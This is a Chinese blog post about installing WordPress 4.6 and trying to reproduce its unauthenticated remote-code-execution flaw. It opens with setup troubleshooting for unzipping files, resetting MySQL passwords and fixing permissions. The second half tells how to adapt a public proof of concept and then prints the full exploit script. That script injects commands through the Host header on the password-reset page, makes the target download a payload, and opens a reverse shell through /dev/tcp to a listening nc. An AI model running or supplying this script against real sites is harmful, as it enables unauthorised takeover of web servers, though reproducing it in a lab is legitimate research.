Loading

Wordpress安装及4.6漏洞问题

感觉在学校的日子每天都是复习备考度过。。。这么多考试,还要隔几天考一门!

但是在曝出wordpress4.6漏洞之后,也想体验一把复现的成就感
但是。。。这个poc条件很苛刻的,加上自己又很菜。。。我依旧没有成功,
这里主要写复现时遇到的问题

wordpress4.6安装

我以前第一个博客就是wordpress搭建的,所以也算轻车熟路了吧,具体的操作网上一堆教程
这里是4.6的安装包WordPress4.6.zip
下面就说一下安装可能遇到的问题。

wordpress安装包解压

如果解压之后再拖进vps是比较慢的,这时候你可以上传压缩包,然后解压
我们有时候想解压到具体目录,比如:/www/wwwroot/www.flywinky.info/
可以这样操作unzip xx.zip -d /www/wwwroot/www.flywinky.info/

mysql数据库不能连接-1

我并不知道这件事为什么每次我搭建的时候都会发生。
如果他说是账户名和密码错误的话,可以进行下面的操作

首先停止Mysql

sudo /usr/local/mysql/support-files/mysql.server stop

以安全模式启动

sudo mysqld_safe --skip-grant-tables

以没有密码登录mysql

首先你需要打开另一个shell,进行下面的操作

sudo mysqld_safe --skip-grant-tables
mysql> UPDATE mysql.user SET Password=PASSWORD('你的新密码') WHERE User='用户名';

重启Mysql

sudo /usr/local/mysql/support-files/mysql.server start

mysql数据库不能连接-2

即使重建密码,有时候也可能会出现你不知道自己到底建了什么数据库名。。。。
wordpress搭建的时候需要填写数据库名,这时候可以在shell端进行下面的操作查询
连接mysql

mysql -u root -ppassword

这里你可能遇到下图的问题,这是因为"-p"和“password"之间没有空格
WordPress4.6

查看数据库名

show databases;

PS:其他的一些数据库命令

不能更换主题和插件

后台安装插件或主题都提示需要输入FTP信息
出现这个问题,是因为文件目录权限问题,登录VPS

chmod -R 755 /home/wwwroot
chown -R www /home/wwwroot

poc的利用

poc出现报错

如下图,这里是因为windows里,编辑会存在换行\r,linux报错

wordpress4.6-2

用正则表达式进行去除'\r',或者用下面的解决:

yum install dos2unix
dos2unix **.sh

poc修改

首先是host地址修改为靶机ip
然后user_login=admin,这里的admin一定要写成靶机里存在的用户名
还有就是靶机必须要安装exim4

sudo apt-get install exim4

用下面的命令进行配置,第一项选择第一个“internet site; mail is sent and received directly using SMTP”
然后一路默认就行了

dpkg-reconfigure exim4-config

PS:安装exim4

最后附上歪果仁作者的poc

	rev_host="192.168.57.1" ##1
    function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";
      ## replace / with ${substr{0}{1}{$spool_directory}}
      ##sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
      ## replace ' ' (space) with
      ##sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      ##return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
    }
    ##cat exploitbox.ans
    intro="
    DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
    bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
    G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
    G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
    IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
    IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
    X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
    b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
    NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
    TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
    QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
    NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
    G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
    eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
    WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
    TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
    ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
    MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
    G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
    WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
    NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
    MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
    X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
    bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
    intro2="
    ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
    fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
    MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
    ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
    aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
    fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
    ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
    bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
    ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
    ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
    bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
    cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
    echo "$intro"  | base64 -d
    echo "$intro2" | base64 -d
    if [ "$##" -ne 1 ]; then
    echo -e "Usage:\n$0 target-wordpress-url\n"
    exit 1
    fi
    target="$1"
    echo -ne "\e[91m[*]\033[0m"
    read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
    echo
    if [ "$choice" == "y" ]; then
    echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
    echo -e "\e[92m[+]\033[0m Connected to the target"
    ## Serve payload/bash script on :80
    RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
    echo "$RCE_exec_cmd" > rce.txt
    python -mSimpleHTTPServer 80 2>/dev/null >&2 &
    hpid=$!
    ## Save payload on the target in /tmp/rce
    cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
    prep_host_header "$cmd"
    curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php? action=lostpassword ##2
    echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
    ## Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
    cmd="/bin/bash /tmp/rce"
    prep_host_header "$cmd"
    curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword & ##3
    echo -e "\n\e[92m[+]\033[0m Payload executed!"
    echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
    nc -vv -l 1337
    echo
    else
    echo -e "\e[92m[+]\033[0m Responsible choice ;)
  Exiting.\n"
    exit 0
    fi
    echo "Exiting..."
    exit 0

PS:漏洞利用详情(扶墙)
POC演示

posted @ 2017-05-06 20:59  bay1  阅读(416)  评论(0编辑  收藏  举报